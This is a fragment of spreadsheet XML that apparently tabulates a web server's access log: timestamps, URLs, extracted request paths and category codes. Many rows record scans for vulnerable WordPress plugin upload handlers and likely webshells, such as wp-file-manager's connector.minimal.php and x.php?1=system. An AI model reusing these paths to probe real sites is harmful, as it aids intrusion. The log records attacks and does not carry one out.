        <v>1072</v>
      </c>
      <c r="D6016" t="str">
        <f t="shared" si="93"/>
        <v>view.php?name=Bidisha%20Guha</v>
      </c>
      <c r="E6016" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="6017" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6017" s="1">
        <v>45067.271608796298</v>
      </c>
      <c r="B6017" t="s">
        <v>1229</v>
      </c>
      <c r="C6017" t="s">
        <v>5</v>
      </c>
      <c r="D6017" t="str">
        <f t="shared" si="93"/>
        <v/>
      </c>
      <c r="E6017" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="6018" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6018" s="1">
        <v>45067.237523148149</v>
      </c>
      <c r="B6018" t="s">
        <v>4</v>
      </c>
      <c r="C6018" t="s">
        <v>5</v>
      </c>
      <c r="D6018" t="str">
        <f t="shared" ref="D6018:D6081" si="94">MID(C6018,FIND("#", SUBSTITUTE(C6018, "/", "#", 3))+1,LEN(C6018)-FIND("#", SUBSTITUTE(C6018, "/", "#", 3))+1)</f>
        <v/>
      </c>
      <c r="E6018" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="6019" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6019" s="1">
        <v>45067.224259259259</v>
      </c>
      <c r="B6019" t="s">
        <v>1993</v>
      </c>
      <c r="C6019" t="s">
        <v>1987</v>
      </c>
      <c r="D6019" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/updates.php</v>
      </c>
      <c r="E6019" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6020" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6020" s="1">
        <v>45067.22420138889</v>
      </c>
      <c r="B6020" t="s">
        <v>1993</v>
      </c>
      <c r="C6020" t="s">
        <v>1987</v>
      </c>
      <c r="D6020" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/updates.php</v>
      </c>
      <c r="E6020" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6021" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6021" s="1">
        <v>45067.193518518521</v>
      </c>
      <c r="B6021" t="s">
        <v>1993</v>
      </c>
      <c r="C6021" t="s">
        <v>1378</v>
      </c>
      <c r="D6021" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/wp-file-upload/ROOBOTS.php</v>
      </c>
      <c r="E6021" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6022" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6022" s="1">
        <v>45067.193495370368</v>
      </c>
      <c r="B6022" t="s">
        <v>1993</v>
      </c>
      <c r="C6022" t="s">
        <v>1379</v>
      </c>
      <c r="D6022" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/wordpresss3cll/up.php</v>
      </c>
      <c r="E6022" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6023" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6023" s="1">
        <v>45067.193472222221</v>
      </c>
      <c r="B6023" t="s">
        <v>1993</v>
      </c>
      <c r="C6023" t="s">
        <v>1380</v>
      </c>
      <c r="D6023" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/TOPXOH/wDR.php</v>
      </c>
      <c r="E6023" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6024" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6024" s="1">
        <v>45067.193460648145</v>
      </c>
      <c r="B6024" t="s">
        <v>1993</v>
      </c>
      <c r="C6024" t="s">
        <v>1381</v>
      </c>
      <c r="D6024" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/anttt/simple.php</v>
      </c>
      <c r="E6024" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6025" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6025" s="1">
        <v>45067.075775462959</v>
      </c>
      <c r="B6025" t="s">
        <v>1993</v>
      </c>
      <c r="C6025" t="s">
        <v>1987</v>
      </c>
      <c r="D6025" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/updates.php</v>
      </c>
      <c r="E6025" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6026" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6026" s="1">
        <v>45067.075752314813</v>
      </c>
      <c r="B6026" t="s">
        <v>1993</v>
      </c>
      <c r="C6026" t="s">
        <v>1987</v>
      </c>
      <c r="D6026" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/updates.php</v>
      </c>
      <c r="E6026" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6027" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6027" s="1">
        <v>45067.04383101852</v>
      </c>
      <c r="B6027" t="s">
        <v>1993</v>
      </c>
      <c r="C6027" t="s">
        <v>344</v>
      </c>
      <c r="D6027" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/background-image-cropper/ups.php</v>
      </c>
      <c r="E6027" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6028" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6028" s="1">
        <v>45067.043761574074</v>
      </c>
      <c r="B6028" t="s">
        <v>1993</v>
      </c>
      <c r="C6028" t="s">
        <v>344</v>
      </c>
      <c r="D6028" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/background-image-cropper/ups.php</v>
      </c>
      <c r="E6028" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6029" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6029" s="1">
        <v>45067.032025462962</v>
      </c>
      <c r="B6029" t="s">
        <v>1993</v>
      </c>
      <c r="C6029" t="s">
        <v>41</v>
      </c>
      <c r="D6029" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E6029" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6030" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6030" s="1">
        <v>45067.031898148147</v>
      </c>
      <c r="B6030" t="s">
        <v>1993</v>
      </c>
      <c r="C6030" t="s">
        <v>41</v>
      </c>
      <c r="D6030" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E6030" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6031" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6031" s="1">
        <v>45066.946932870371</v>
      </c>
      <c r="B6031" t="s">
        <v>4</v>
      </c>
      <c r="C6031" t="s">
        <v>1994</v>
      </c>
      <c r="D6031" t="str">
        <f t="shared" si="94"/>
        <v>view.php?name=Niveditha%20Gowda</v>
      </c>
      <c r="E6031" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="6032" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6032" s="1">
        <v>45066.946828703702</v>
      </c>
      <c r="B6032" t="s">
        <v>4</v>
      </c>
      <c r="C6032" t="s">
        <v>5</v>
      </c>
      <c r="D6032" t="str">
        <f t="shared" si="94"/>
        <v/>
      </c>
      <c r="E6032" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="6033" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6033" s="1">
        <v>45066.927534722221</v>
      </c>
      <c r="B6033" t="s">
        <v>4</v>
      </c>
      <c r="C6033" t="s">
        <v>5</v>
      </c>
      <c r="D6033" t="str">
        <f t="shared" si="94"/>
        <v/>
      </c>
      <c r="E6033" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="6034" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6034" s="1">
        <v>45066.760659722226</v>
      </c>
      <c r="B6034" t="s">
        <v>1229</v>
      </c>
      <c r="C6034" t="s">
        <v>5</v>
      </c>
      <c r="D6034" t="str">
        <f t="shared" si="94"/>
        <v/>
      </c>
      <c r="E6034" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="6035" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6035" s="1">
        <v>45066.718784722223</v>
      </c>
      <c r="B6035" t="s">
        <v>1996</v>
      </c>
      <c r="C6035" t="s">
        <v>5</v>
      </c>
      <c r="D6035" t="str">
        <f t="shared" si="94"/>
        <v/>
      </c>
      <c r="E6035" t="s">
        <v>61</v>
      </c>
    </row>
    <row r="6036" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6036" s="1">
        <v>45066.236990740741</v>
      </c>
      <c r="B6036" t="s">
        <v>4</v>
      </c>
      <c r="C6036" t="s">
        <v>5</v>
      </c>
      <c r="D6036" t="str">
        <f t="shared" si="94"/>
        <v/>
      </c>
      <c r="E6036" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="6037" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6037" s="1">
        <v>45066.140648148146</v>
      </c>
      <c r="B6037" t="s">
        <v>4</v>
      </c>
      <c r="C6037" t="s">
        <v>5</v>
      </c>
      <c r="D6037" t="str">
        <f t="shared" si="94"/>
        <v/>
      </c>
      <c r="E6037" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="6038" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6038" s="1">
        <v>45066.140462962961</v>
      </c>
      <c r="B6038" t="s">
        <v>4</v>
      </c>
      <c r="C6038" t="s">
        <v>5</v>
      </c>
      <c r="D6038" t="str">
        <f t="shared" si="94"/>
        <v/>
      </c>
      <c r="E6038" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="6039" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6039" s="1">
        <v>45066.139722222222</v>
      </c>
      <c r="B6039" t="s">
        <v>4</v>
      </c>
      <c r="C6039" t="s">
        <v>5</v>
      </c>
      <c r="D6039" t="str">
        <f t="shared" si="94"/>
        <v/>
      </c>
      <c r="E6039" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="6040" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6040" s="1">
        <v>45065.997939814813</v>
      </c>
      <c r="B6040" t="s">
        <v>1997</v>
      </c>
      <c r="C6040" t="s">
        <v>1998</v>
      </c>
      <c r="D6040" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/gatewayapi/inc/a57bze8931.php</v>
      </c>
      <c r="E6040" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6041" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6041" s="1">
        <v>45065.997939814813</v>
      </c>
      <c r="B6041" t="s">
        <v>1997</v>
      </c>
      <c r="C6041" t="s">
        <v>1999</v>
      </c>
      <c r="D6041" t="str">
        <f t="shared" si="94"/>
        <v>/wp-content/plugins/divi-contact-extended/includes/upload.php</v>
      </c>
      <c r="E6041" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6042" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6042" s="1">
        <v>45065.997928240744</v>
      </c>
      <c r="B6042" t="s">
        <v>1997</v>
      </c>
      <c r="C6042" t="s">
        <v>1368</v>
      </c>
      <c r="D6042" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php</v>
      </c>
      <c r="E6042" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6043" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6043" s="1">
        <v>45065.997928240744</v>
      </c>
      <c r="B6043" t="s">
        <v>1997</v>
      </c>
      <c r="C6043" t="s">
        <v>2000</v>
      </c>
      <c r="D6043" t="str">
        <f t="shared" si="94"/>
        <v>/wp-content/plugins/gatewayapi/inc/css_js.php</v>
      </c>
      <c r="E6043" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6044" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6044" s="1">
        <v>45065.997916666667</v>
      </c>
      <c r="B6044" t="s">
        <v>1997</v>
      </c>
      <c r="C6044" t="s">
        <v>1372</v>
      </c>
      <c r="D6044" t="str">
        <f t="shared" si="94"/>
        <v>/wp-content/x.php?1=system</v>
      </c>
      <c r="E6044" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6045" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6045" s="1">
        <v>45065.997916666667</v>
      </c>
      <c r="B6045" t="s">
        <v>1997</v>
      </c>
      <c r="C6045" t="s">
        <v>1369</v>
      </c>
      <c r="D6045" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/king.php</v>
      </c>
      <c r="E6045" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6046" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6046" s="1">
        <v>45065.997916666667</v>
      </c>
      <c r="B6046" t="s">
        <v>1997</v>
      </c>
      <c r="C6046" t="s">
        <v>1370</v>
      </c>
      <c r="D6046" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php</v>
      </c>
      <c r="E6046" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6047" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6047" s="1">
        <v>45065.99790509259</v>
      </c>
      <c r="B6047" t="s">
        <v>1997</v>
      </c>
      <c r="C6047" t="s">
        <v>1374</v>
      </c>
      <c r="D6047" t="str">
        <f t="shared" si="94"/>
        <v>abruzi.php4</v>
      </c>
      <c r="E6047" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6048" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6048" s="1">
        <v>45065.99790509259</v>
      </c>
      <c r="B6048" t="s">
        <v>1997</v>
      </c>
      <c r="C6048" t="s">
        <v>1371</v>
      </c>
      <c r="D6048" t="str">
        <f t="shared" si="94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048" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6049" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6049" s="1">
        <v>45065.997893518521</v>
      </c>
      <c r="B6049" t="s">
        <v>1997</v>
      </c>
      <c r="C6049" t="s">
        <v>2001</v>
      </c>
      <c r="D6049" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/formcraft/file-upload/server/php/files/a57bze8931.php</v>
      </c>
      <c r="E6049" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6050" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6050" s="1">
        <v>45065.997893518521</v>
      </c>
      <c r="B6050" t="s">
        <v>1997</v>
      </c>
      <c r="C6050" t="s">
        <v>1373</v>
      </c>
      <c r="D6050" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/uploads/typehub/custom/a57bze8931/.__a57bze8931.php</v>
      </c>
      <c r="E6050" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6051" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6051" s="1">
        <v>45065.997881944444</v>
      </c>
      <c r="B6051" t="s">
        <v>1997</v>
      </c>
      <c r="C6051" t="s">
        <v>2002</v>
      </c>
      <c r="D6051" t="str">
        <f t="shared" si="94"/>
        <v>/wp-content/plugins/cherry-plugin/admin/import-export/upload.php</v>
      </c>
      <c r="E6051" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6052" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6052" s="1">
        <v>45065.997881944444</v>
      </c>
      <c r="B6052" t="s">
        <v>1997</v>
      </c>
      <c r="C6052" t="s">
        <v>2003</v>
      </c>
      <c r="D6052" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/cherry-plugin/admin/import-export/a57bze8931.php</v>
      </c>
      <c r="E6052" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6053" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6053" s="1">
        <v>45065.997881944444</v>
      </c>
      <c r="B6053" t="s">
        <v>1997</v>
      </c>
      <c r="C6053" t="s">
        <v>2004</v>
      </c>
      <c r="D6053" t="str">
        <f t="shared" si="94"/>
        <v>/wp-content/plugins/formcraft/file-upload/server/php/</v>
      </c>
      <c r="E6053" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6054" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6054" s="1">
        <v>45065.997870370367</v>
      </c>
      <c r="B6054" t="s">
        <v>1997</v>
      </c>
      <c r="C6054" t="s">
        <v>1377</v>
      </c>
      <c r="D6054" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/uploads/kaswara/fonts_icon/a57bze8931/.__a57bze8931.php</v>
      </c>
      <c r="E6054" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6055" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6055" s="1">
        <v>45065.997870370367</v>
      </c>
      <c r="B6055" t="s">
        <v>1997</v>
      </c>
      <c r="C6055" t="s">
        <v>1375</v>
      </c>
      <c r="D6055" t="str">
        <f t="shared" si="94"/>
        <v>/wp-content/plugins/apikey/apikey.php</v>
      </c>
      <c r="E6055" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6056" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6056" s="1">
        <v>45065.997870370367</v>
      </c>
      <c r="B6056" t="s">
        <v>1997</v>
      </c>
      <c r="C6056" t="s">
        <v>1376</v>
      </c>
      <c r="D6056" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/apikey/a57bze8931.php</v>
      </c>
      <c r="E6056" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6057" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6057" s="1">
        <v>45065.997858796298</v>
      </c>
      <c r="B6057" t="s">
        <v>1997</v>
      </c>
      <c r="C6057" t="s">
        <v>2005</v>
      </c>
      <c r="D6057" t="str">
        <f t="shared" si="94"/>
        <v>/wp-content/plugins/wp-engine-module/wp-engine.php</v>
      </c>
      <c r="E6057" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6058" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6058" s="1">
        <v>45065.997858796298</v>
      </c>
      <c r="B6058" t="s">
        <v>1997</v>
      </c>
      <c r="C6058" t="s">
        <v>2006</v>
      </c>
      <c r="D6058" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/wp-engine-module/a57bze8931.php</v>
      </c>
      <c r="E6058" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6059" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6059" s="1">
        <v>45065.997847222221</v>
      </c>
      <c r="B6059" t="s">
        <v>1997</v>
      </c>
      <c r="C6059" t="s">
        <v>2007</v>
      </c>
      <c r="D6059" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/ioptimizations/a57bze8931.php</v>
      </c>
      <c r="E6059" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6060" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6060" s="1">
        <v>45065.997847222221</v>
      </c>
      <c r="B6060" t="s">
        <v>1997</v>
      </c>
      <c r="C6060" t="s">
        <v>2008</v>
      </c>
      <c r="D6060" t="str">
        <f t="shared" si="94"/>
        <v>/wp-content/plugins/ioptimization/IOptimize.php?rchk</v>
      </c>
      <c r="E6060" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6061" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6061" s="1">
        <v>45065.997847222221</v>
      </c>
      <c r="B6061" t="s">
        <v>1997</v>
      </c>
      <c r="C6061" t="s">
        <v>2009</v>
      </c>
      <c r="D6061" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/ioptimization/a57bze8931.php</v>
      </c>
      <c r="E6061" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6062" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6062" s="1">
        <v>45065.997835648152</v>
      </c>
      <c r="B6062" t="s">
        <v>1997</v>
      </c>
      <c r="C6062" t="s">
        <v>2010</v>
      </c>
      <c r="D6062" t="str">
        <f t="shared" si="94"/>
        <v>/wp-content/plugins/dzs-zoomsounds/savepng.php?location=a57bze8931.php</v>
      </c>
      <c r="E6062" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6063" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6063" s="1">
        <v>45065.997835648152</v>
      </c>
      <c r="B6063" t="s">
        <v>1997</v>
      </c>
      <c r="C6063" t="s">
        <v>2011</v>
      </c>
      <c r="D6063" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/dzs-zoomsounds/a57bze8931.php</v>
      </c>
      <c r="E6063" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6064" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6064" s="1">
        <v>45065.997835648152</v>
      </c>
      <c r="B6064" t="s">
        <v>1997</v>
      </c>
      <c r="C6064" t="s">
        <v>2012</v>
      </c>
      <c r="D6064" t="str">
        <f t="shared" si="94"/>
        <v>/wp-content/plugins/ioptimizations/IOptimizes.php?hamlorszd</v>
      </c>
      <c r="E6064" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6065" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6065" s="1">
        <v>45065.949259259258</v>
      </c>
      <c r="B6065" t="s">
        <v>1997</v>
      </c>
      <c r="C6065" t="s">
        <v>1378</v>
      </c>
      <c r="D6065" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/wp-file-upload/ROOBOTS.php</v>
      </c>
      <c r="E6065" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6066" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6066" s="1">
        <v>45065.949247685188</v>
      </c>
      <c r="B6066" t="s">
        <v>1997</v>
      </c>
      <c r="C6066" t="s">
        <v>1380</v>
      </c>
      <c r="D6066" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/TOPXOH/wDR.php</v>
      </c>
      <c r="E6066" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6067" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6067" s="1">
        <v>45065.949247685188</v>
      </c>
      <c r="B6067" t="s">
        <v>1997</v>
      </c>
      <c r="C6067" t="s">
        <v>1379</v>
      </c>
      <c r="D6067" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/wordpresss3cll/up.php</v>
      </c>
      <c r="E6067" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6068" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6068" s="1">
        <v>45065.949236111112</v>
      </c>
      <c r="B6068" t="s">
        <v>1997</v>
      </c>
      <c r="C6068" t="s">
        <v>1381</v>
      </c>
      <c r="D6068" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/anttt/simple.php</v>
      </c>
      <c r="E6068" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6069" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6069" s="1">
        <v>45065.894548611112</v>
      </c>
      <c r="B6069" t="s">
        <v>1997</v>
      </c>
      <c r="C6069" t="s">
        <v>41</v>
      </c>
      <c r="D6069" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E6069" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6070" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6070" s="1">
        <v>45065.894548611112</v>
      </c>
      <c r="B6070" t="s">
        <v>1997</v>
      </c>
      <c r="C6070" t="s">
        <v>41</v>
      </c>
      <c r="D6070" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E6070" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6071" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6071" s="1">
        <v>45065.86922453704</v>
      </c>
      <c r="B6071" t="s">
        <v>1997</v>
      </c>
      <c r="C6071" t="s">
        <v>1378</v>
      </c>
      <c r="D6071" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/wp-file-upload/ROOBOTS.php</v>
      </c>
      <c r="E6071" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6072" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6072" s="1">
        <v>45065.869212962964</v>
      </c>
      <c r="B6072" t="s">
        <v>1997</v>
      </c>
      <c r="C6072" t="s">
        <v>1379</v>
      </c>
      <c r="D6072" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/wordpresss3cll/up.php</v>
      </c>
      <c r="E6072" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6073" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6073" s="1">
        <v>45065.869201388887</v>
      </c>
      <c r="B6073" t="s">
        <v>1997</v>
      </c>
      <c r="C6073" t="s">
        <v>1380</v>
      </c>
      <c r="D6073" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/TOPXOH/wDR.php</v>
      </c>
      <c r="E6073" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6074" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6074" s="1">
        <v>45065.869189814817</v>
      </c>
      <c r="B6074" t="s">
        <v>1997</v>
      </c>
      <c r="C6074" t="s">
        <v>1381</v>
      </c>
      <c r="D6074" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/anttt/simple.php</v>
      </c>
      <c r="E6074" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6075" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6075" s="1">
        <v>45065.840787037036</v>
      </c>
      <c r="B6075" t="s">
        <v>1997</v>
      </c>
      <c r="C6075" t="s">
        <v>1987</v>
      </c>
      <c r="D6075" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/updates.php</v>
      </c>
      <c r="E6075" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6076" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6076" s="1">
        <v>45065.840787037036</v>
      </c>
      <c r="B6076" t="s">
        <v>1997</v>
      </c>
      <c r="C6076" t="s">
        <v>1987</v>
      </c>
      <c r="D6076" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/updates.php</v>
      </c>
      <c r="E6076" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6077" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6077" s="1">
        <v>45065.838622685187</v>
      </c>
      <c r="B6077" t="s">
        <v>1997</v>
      </c>
      <c r="C6077" t="s">
        <v>344</v>
      </c>
      <c r="D6077" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/background-image-cropper/ups.php</v>
      </c>
      <c r="E6077" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6078" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6078" s="1">
        <v>45065.838622685187</v>
      </c>
      <c r="B6078" t="s">
        <v>1997</v>
      </c>
      <c r="C6078" t="s">
        <v>41</v>
      </c>
      <c r="D6078" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E6078" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6079" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6079" s="1">
        <v>45065.838622685187</v>
      </c>
      <c r="B6079" t="s">
        <v>1997</v>
      </c>
      <c r="C6079" t="s">
        <v>344</v>
      </c>
      <c r="D6079" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/plugins/background-image-cropper/ups.php</v>
      </c>
      <c r="E6079" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6080" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6080" s="1">
        <v>45065.83861111111</v>
      </c>
      <c r="B6080" t="s">
        <v>1997</v>
      </c>
      <c r="C6080" t="s">
        <v>41</v>
      </c>
      <c r="D6080" t="str">
        <f t="shared" si="94"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E6080" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6081" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6081" s="1">
        <v>45065.834733796299</v>
      </c>
      <c r="B6081" t="s">
        <v>1302</v>
      </c>
      <c r="C6081" t="s">
        <v>1985</v>
      </c>
      <c r="D6081" t="str">
        <f t="shared" si="94"/>
        <v>rindex.php?action=add</v>
      </c>
      <c r="E6081" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6082" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6082" s="1">
        <v>45065.834444444445</v>
      </c>
      <c r="B6082" t="s">
        <v>1302</v>
      </c>
      <c r="C6082" t="s">
        <v>1794</v>
      </c>
      <c r="D6082" t="str">
        <f t="shared" ref="D6082:D6145" si="95">MID(C6082,FIND("#", SUBSTITUTE(C6082, "/", "#", 3))+1,LEN(C6082)-FIND("#", SUBSTITUTE(C6082, "/", "#", 3))+1)</f>
        <v>wp-content/plugins/hellopress/wp_filemanager.php</v>
      </c>
      <c r="E6082" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6083" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6083" s="1">
        <v>45065.834224537037</v>
      </c>
      <c r="B6083" t="s">
        <v>1302</v>
      </c>
      <c r="C6083" t="s">
        <v>1126</v>
      </c>
      <c r="D6083" t="str">
        <f t="shared" si="95"/>
        <v>repeater.php</v>
      </c>
      <c r="E6083" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6084" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6084" s="1">
        <v>45065.834027777775</v>
      </c>
      <c r="B6084" t="s">
        <v>1302</v>
      </c>
      <c r="C6084" t="s">
        <v>1126</v>
      </c>
      <c r="D6084" t="str">
        <f t="shared" si="95"/>
        <v>repeater.php</v>
      </c>
      <c r="E6084" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6085" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6085" s="1">
        <v>45065.833298611113</v>
      </c>
      <c r="B6085" t="s">
        <v>1302</v>
      </c>
      <c r="C6085" t="s">
        <v>1577</v>
      </c>
      <c r="D6085" t="str">
